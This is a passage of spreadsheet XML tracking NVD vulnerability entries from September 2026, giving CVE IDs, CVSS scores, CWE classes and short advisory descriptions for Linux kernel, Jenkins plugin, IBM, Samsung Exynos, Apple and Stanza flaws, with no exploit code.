      <c r="G422" s="5" t="inlineStr"/>
      <c r="H422" s="5" t="inlineStr"/>
      <c r="I422" s="5" t="inlineStr"/>
      <c r="J422" s="5" t="inlineStr"/>
      <c r="K422" s="5" t="inlineStr"/>
      <c r="L422" s="5" t="inlineStr"/>
      <c r="M422" s="5" t="inlineStr"/>
      <c r="N422" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O422" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P422" s="5" t="inlineStr"/>
      <c r="Q422" s="5" t="inlineStr"/>
      <c r="R422" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
clk: meson: align gxbb_32k_clk_sel number of parents with actual count
The following out-of-bounds read has been observed by Christian on a
GXBB WeTek Hub:
==================================================================
BUG: KASAN: global-out-of-bounds in __clk_register+0x1b70/0x2418
Read of size 8 at addr ffffd66320cf88e0 by task swapper/0/1
CPU: 0 UID: 0 PID: 1 Comm: swapper/0 Not tainted 7.0.0-rc5 #1 PREEMPT
Hardware name: WeTek Hub (DT)
Call trace:
 show_stack+0x14/0x20 (C)
 dump_stack_lvl+0x74/0x94
 print_report+0x164/0x4b0
 kasan_report+0x98/0xd8
 __asan_report_load8_noabort+0x1c/0x24
 __clk_register+0x1b70/0x2418
 devm_clk_hw_register+0x74/0x15c
 meson_clkc_init+0xd4/0x20c
 meson_clkc_syscon_probe+0x5c/0x94
 platform_probe+0xbc/0x17c
 really_probe+0x184/0x844
 __driver_probe_device+0x154/0x35c
 driver_probe_device+0x60/0x188
 __driver_attach+0x168/0x4a0
 bus_for_each_dev+0xec/0x180
 driver_attach+0x38/0x58
 bus_add_driver+0x238/0x4c0
 driver_register+0x150/0x388
 __platform_driver_register+0x54/0x7c
 gxbb_clkc_driver_init+0x18/0x20
 do_one_initcall+0xb8/0x340
 kernel_init_freeable+0x49c/0x52c
 kernel_init+0x24/0x148
 ret_from_fork+0x10/0x20
The buggy address belongs to the variable:
 gxbb_32k_clk_parents+0x60/0x400
The buggy address belongs to a vmalloc virtual mapping
The buggy address belongs to the physical page:
Memory state around the buggy address:
 ffffd66320cf8780: 00 00 00 00 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9
 ffffd66320cf8800: 00 04 f9 f9 f9 f9 f9 f9 00 04 f9 f9 f9 f9 f9 f9
&gt;ffffd66320cf8880: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
                                                       ^
 ffffd66320cf8900: 00 01 f9 f9 f9 f9 f9 f9 00 06 f9 f9 f9 f9 f9 f9
 ffffd66320cf8980: 00 00 02 f9 f9 f9 f9 f9 00 00 02 f9 f9 f9 f9 f9
==================================================================
Commit 7915d7d5407c ("clk: amlogic: gxbb: drop non existing 32k clock
parent") dropped a non-existing clock parent from the gxbb_32k_clk_sel
mux but didn't adjust the hard-coded num_parents field. Fix the actual
number of parents of that mux by using ARRAY_SIZE instead (avoiding
similar problems in future).</t>
        </is>
      </c>
      <c r="S422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89947</t>
        </is>
      </c>
    </row>
    <row r="423">
      <c r="A423" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B423" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89954</t>
        </is>
      </c>
      <c r="D423" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E423" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F423" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G423" s="5" t="inlineStr"/>
      <c r="H423" s="5" t="inlineStr"/>
      <c r="I423" s="5" t="inlineStr"/>
      <c r="J423" s="5" t="inlineStr"/>
      <c r="K423" s="5" t="inlineStr"/>
      <c r="L423" s="5" t="inlineStr"/>
      <c r="M423" s="5" t="inlineStr"/>
      <c r="N423" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O423" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P423" s="5" t="inlineStr"/>
      <c r="Q423" s="5" t="inlineStr"/>
      <c r="R423" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mtd: afs: validate v2 image info bounds
The AFS v2 parser uses footer[8] to locate the image information block
inside the current erase block, then uses the image information
region_count to walk entries from a fixed local array. The footer offset
and region count come from flash contents and are not checked against the
erase block or the local image-info array before use.
Reject v2 entries whose image information offset would underflow the
erase block calculation, and reject region counts that cannot fit in the
local image-info array before walking region entries.</t>
        </is>
      </c>
      <c r="S423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89954</t>
        </is>
      </c>
    </row>
    <row r="424">
      <c r="A424" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B424" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92127</t>
        </is>
      </c>
      <c r="D424" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E424" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F424" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G424" s="5" t="inlineStr"/>
      <c r="H424" s="5" t="inlineStr"/>
      <c r="I424" s="5" t="inlineStr"/>
      <c r="J424" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K424" s="5" t="inlineStr"/>
      <c r="L424" s="5" t="inlineStr"/>
      <c r="M424" s="5" t="inlineStr"/>
      <c r="N424" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O424" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P424" s="5" t="inlineStr"/>
      <c r="Q424" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R424" s="5" t="inlineStr">
        <is>
          <t>Jenkins Script Security Plugin 1415.v9a_f9b_3a_c253d and earlier automatically approves the classpath entries in an item configuration when a user with Overall/Administer permission copies the item, or updates that configuration through the REST API or CLI, allowing attackers able to define classpath entries to execute arbitrary code in the context of the Jenkins controller JVM.</t>
        </is>
      </c>
      <c r="S424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92127</t>
        </is>
      </c>
    </row>
    <row r="425">
      <c r="A425" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B425" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92134</t>
        </is>
      </c>
      <c r="D425" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E425" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F425" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G425" s="5" t="inlineStr"/>
      <c r="H425" s="5" t="inlineStr"/>
      <c r="I425" s="5" t="inlineStr"/>
      <c r="J425" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K425" s="5" t="inlineStr"/>
      <c r="L425" s="5" t="inlineStr"/>
      <c r="M425" s="5" t="inlineStr"/>
      <c r="N425" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O425" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P425" s="5" t="inlineStr"/>
      <c r="Q425" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R425" s="5" t="inlineStr">
        <is>
          <t>Jenkins Warnings Plugin 13.10258.va_17d49a_78c3b_ and earlier does not validate the analysis results ID when a job configuration is submitted through the REST API, allowing attackers with Item/Configure permission to use a javascript: scheme URL as identifier, resulting in a stored cross-site scripting (XSS) vulnerability.</t>
        </is>
      </c>
      <c r="S425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92134</t>
        </is>
      </c>
    </row>
    <row r="426">
      <c r="A426" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B426" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92135</t>
        </is>
      </c>
      <c r="D426" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E426" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F426" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G426" s="5" t="inlineStr"/>
      <c r="H426" s="5" t="inlineStr"/>
      <c r="I426" s="5" t="inlineStr"/>
      <c r="J426" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K426" s="5" t="inlineStr"/>
      <c r="L426" s="5" t="inlineStr"/>
      <c r="M426" s="5" t="inlineStr"/>
      <c r="N426" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O426" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P426" s="5" t="inlineStr"/>
      <c r="Q426" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R426" s="5" t="inlineStr">
        <is>
          <t>Jenkins Coverage Plugin 3.3358.v9487dde48783 and earlier does not validate the coverage results ID when a job configuration is submitted through the REST API, allowing attackers with Item/Configure permission to use a javascript: scheme URL as identifier, resulting in a stored cross-site scripting (XSS) vulnerability.</t>
        </is>
      </c>
      <c r="S426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92135</t>
        </is>
      </c>
    </row>
    <row r="427">
      <c r="A427" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B427" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92136</t>
        </is>
      </c>
      <c r="D427" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E427" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F427" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G427" s="5" t="inlineStr"/>
      <c r="H427" s="5" t="inlineStr"/>
      <c r="I427" s="5" t="inlineStr"/>
      <c r="J427" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K427" s="5" t="inlineStr"/>
      <c r="L427" s="5" t="inlineStr"/>
      <c r="M427" s="5" t="inlineStr"/>
      <c r="N427" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O427" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P427" s="5" t="inlineStr"/>
      <c r="Q427" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R427" s="5" t="inlineStr">
        <is>
          <t>Jenkins OWASP Dependency-Check Plugin 5.6.4 and earlier does not escape CWE values from Dependency-Check reports on the Jenkins UI, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.</t>
        </is>
      </c>
      <c r="S427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92136</t>
        </is>
      </c>
    </row>
    <row r="428">
      <c r="A428" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B428" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89911</t>
        </is>
      </c>
      <c r="D428" s="5" t="n">
        <v>7.9</v>
      </c>
      <c r="E428" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F428" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G428" s="5" t="inlineStr"/>
      <c r="H428" s="5" t="inlineStr"/>
      <c r="I428" s="5" t="inlineStr"/>
      <c r="J428" s="5" t="inlineStr"/>
      <c r="K428" s="5" t="inlineStr"/>
      <c r="L428" s="5" t="inlineStr"/>
      <c r="M428" s="5" t="inlineStr"/>
      <c r="N428" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O428" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P428" s="5" t="inlineStr"/>
      <c r="Q428" s="5" t="inlineStr"/>
      <c r="R428" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: arm64: Correctly cap TLBI Range to the architural limit
TLB Invalidation by Range has a fairly powerful way of encoding pretty
large ranges in a small number of bits. This range can be based on an
arbitrary VA, which means it is pretty easy for a guest to generate an
overflow should the hypervisor be naive enough to add the range to the
base...
Make sure the range is capped to the limit dictated by the address bit
that determines the VA range. For an IPA invalidation, this is further
corrected down the line to ignore the upper range.</t>
        </is>
      </c>
      <c r="S428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89911</t>
        </is>
      </c>
    </row>
    <row r="429">
      <c r="A429" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B429" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17133</t>
        </is>
      </c>
      <c r="D429" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E429" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F429" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G429" s="5" t="inlineStr"/>
      <c r="H429" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I429" s="5" t="inlineStr"/>
      <c r="J429" s="5" t="inlineStr"/>
      <c r="K429" s="5" t="inlineStr"/>
      <c r="L429" s="5" t="inlineStr"/>
      <c r="M429" s="5" t="inlineStr"/>
      <c r="N429" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O429" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P429" s="5" t="inlineStr"/>
      <c r="Q429" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R429" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.0, and 12.0.1.0 through 12.0.12.27 could allow a local attacker to execute arbitrary code due to improper neutralization of special elements used in an OS command.</t>
        </is>
      </c>
      <c r="S429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17133</t>
        </is>
      </c>
    </row>
    <row r="430">
      <c r="A430" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B430" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17156</t>
        </is>
      </c>
      <c r="D430" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E430" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F430" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G430" s="5" t="inlineStr"/>
      <c r="H430" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I430" s="5" t="inlineStr"/>
      <c r="J430" s="5" t="inlineStr"/>
      <c r="K430" s="5" t="inlineStr"/>
      <c r="L430" s="5" t="inlineStr"/>
      <c r="M430" s="5" t="inlineStr"/>
      <c r="N430" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O430" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P430" s="5" t="inlineStr"/>
      <c r="Q430" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R430" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.0, and 12.0.1.0 through 12.0.12.27 could allow a local attacker to execute arbitrary code due to insecure deserialization.</t>
        </is>
      </c>
      <c r="S430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17156</t>
        </is>
      </c>
    </row>
    <row r="431">
      <c r="A431" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B431" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17416</t>
        </is>
      </c>
      <c r="D431" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E431" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F431" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G431" s="5" t="inlineStr"/>
      <c r="H431" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I431" s="5" t="inlineStr"/>
      <c r="J431" s="5" t="inlineStr"/>
      <c r="K431" s="5" t="inlineStr"/>
      <c r="L431" s="5" t="inlineStr"/>
      <c r="M431" s="5" t="inlineStr"/>
      <c r="N431" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O431" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P431" s="5" t="inlineStr"/>
      <c r="Q431" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R431" s="5" t="inlineStr">
        <is>
          <t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.0, and 12.0.1.0 through 12.0.12.27 could allow a local attacker to execute arbitrary code due to insecure deserialization.</t>
        </is>
      </c>
      <c r="S431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17416</t>
        </is>
      </c>
    </row>
    <row r="432">
      <c r="A432" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B432" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-23789</t>
        </is>
      </c>
      <c r="D432" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E432" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F432" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G432" s="5" t="inlineStr"/>
      <c r="H432" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I432" s="5" t="inlineStr"/>
      <c r="J432" s="5" t="inlineStr"/>
      <c r="K432" s="5" t="inlineStr"/>
      <c r="L432" s="5" t="inlineStr"/>
      <c r="M432" s="5" t="inlineStr"/>
      <c r="N432" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O432" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P432" s="5" t="inlineStr"/>
      <c r="Q432" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R432" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in MFC in Samsung Mobile Processor and Wearable Processor Exynos 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 2600, 1680, W920, W930, and W1000. A double-free vulnerability in the Exynos MFC encoder driver (due to improper cleanup of dma_buf references during error handling) leads to kernel memory corruption and potential arbitrary code execution.</t>
        </is>
      </c>
      <c r="S432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-23789</t>
        </is>
      </c>
    </row>
    <row r="433">
      <c r="A433" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B433" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43684</t>
        </is>
      </c>
      <c r="D433" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E433" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F433" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G433" s="5" t="inlineStr"/>
      <c r="H433" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I433" s="5" t="inlineStr"/>
      <c r="J433" s="5" t="inlineStr"/>
      <c r="K433" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos</t>
        </is>
      </c>
      <c r="L433" s="5" t="inlineStr"/>
      <c r="M433" s="5" t="inlineStr"/>
      <c r="N433" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O433" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P433" s="5" t="inlineStr"/>
      <c r="Q433" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R433" s="5" t="inlineStr">
        <is>
          <t>A use-after-free issue was addressed with improved memory management. This issue is fixed in iOS 26.7 and iPadOS 26.7, macOS Golden Gate 27, macOS Sequoia 15.8. An app may be able to cause unexpected system termination or corrupt kernel memory.</t>
        </is>
      </c>
      <c r="S433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43684</t>
        </is>
      </c>
    </row>
    <row r="434">
      <c r="A434" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B434" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43688</t>
        </is>
      </c>
      <c r="D434" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E434" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F434" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G434" s="5" t="inlineStr"/>
      <c r="H434" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I434" s="5" t="inlineStr"/>
      <c r="J434" s="5" t="inlineStr"/>
      <c r="K434" s="5" t="inlineStr"/>
      <c r="L434" s="5" t="inlineStr"/>
      <c r="M434" s="5" t="inlineStr"/>
      <c r="N434" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O434" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P434" s="5" t="inlineStr"/>
      <c r="Q434" s="5" t="inlineStr">
        <is>
          <t>CWE-1021</t>
        </is>
      </c>
      <c r="R434" s="5" t="inlineStr">
        <is>
          <t>A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 27 and iPadOS 27, macOS Golden Gate 27. Processing a maliciously crafted file may lead to unexpected app termination.</t>
        </is>
      </c>
      <c r="S434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43688</t>
        </is>
      </c>
    </row>
    <row r="435">
      <c r="A435" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B435" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43702</t>
        </is>
      </c>
      <c r="D435" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E435" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F435" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G435" s="5" t="inlineStr"/>
      <c r="H435" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I435" s="5" t="inlineStr"/>
      <c r="J435" s="5" t="inlineStr"/>
      <c r="K435" s="5" t="inlineStr"/>
      <c r="L435" s="5" t="inlineStr"/>
      <c r="M435" s="5" t="inlineStr"/>
      <c r="N435" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O435" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P435" s="5" t="inlineStr"/>
      <c r="Q435" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="R435" s="5" t="inlineStr">
        <is>
          <t>The issue was addressed with improved memory handling. This issue is fixed in iOS 26.6 and iPadOS 26.6, iOS 26.7 and iPadOS 26.7, macOS Sequoia 15.8, macOS Tahoe 26.6, macOS Tahoe 26.7, tvOS 26.6, watchOS 26.6. Processing a maliciously crafted video file may lead to unexpected app termination or corrupt process memory.</t>
        </is>
      </c>
      <c r="S435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43702</t>
        </is>
      </c>
    </row>
    <row r="436">
      <c r="A436" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B436" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59974</t>
        </is>
      </c>
      <c r="D436" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E436" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F436" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G436" s="5" t="inlineStr"/>
      <c r="H436" s="5" t="inlineStr"/>
      <c r="I436" s="5" t="inlineStr"/>
      <c r="J436" s="5" t="inlineStr"/>
      <c r="K436" s="5" t="inlineStr"/>
      <c r="L436" s="5" t="inlineStr"/>
      <c r="M436" s="5" t="inlineStr"/>
      <c r="N436" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O436" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P436" s="5" t="inlineStr"/>
      <c r="Q436" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R436" s="5" t="inlineStr">
        <is>
          <t>Stanza is a Stanford NLP Python library for tokenization, sentence segmentation, NER, and parsing of many human languages. Prior to 1.14.0, stanza.resources.common.unzip in stanza/resources/common.py passes downloaded model and resource archives to zipfile.ZipFile.extractall without validating member paths, and the vulnerable extraction path is reachable through stanza.download and stanza.install_corenlp. A malicious archive containing parent-directory traversal entries can write outside the intended model directory, allowing files writable by the Stanza process to be overwritten and potentially enabling code execution through modified shell configuration, SSH authorization data, Python packages, or executable scripts. This issue is fixed in version 1.14.0.</t>
        </is>
      </c>
      <c r="S436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59974</t>
        </is>
      </c>
    </row>
    <row r="437">
      <c r="A437" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B437" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63325</t>
        </is>
      </c>
      <c r="D437" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E437" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F437" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G437" s="5" t="inlineStr"/>
      <c r="H437" s="5" t="inlineStr"/>
      <c r="I437" s="5" t="inlineStr"/>
      <c r="J437" s="5" t="inlineStr"/>
      <c r="K437" s="5" t="inlineStr"/>
      <c r="L437" s="5" t="inlineStr"/>
      <c r="M437" s="5" t="inlineStr"/>
      <c r="N437" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O437" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P437" s="5" t="inlineStr"/>
      <c r="Q437" s="5" t="inlineStr">
        <is>
          <t>CWE-94, CWE-95</t>
        </is>
      </c>
      <c r="R437" s="5" t="inlineStr">
        <is>
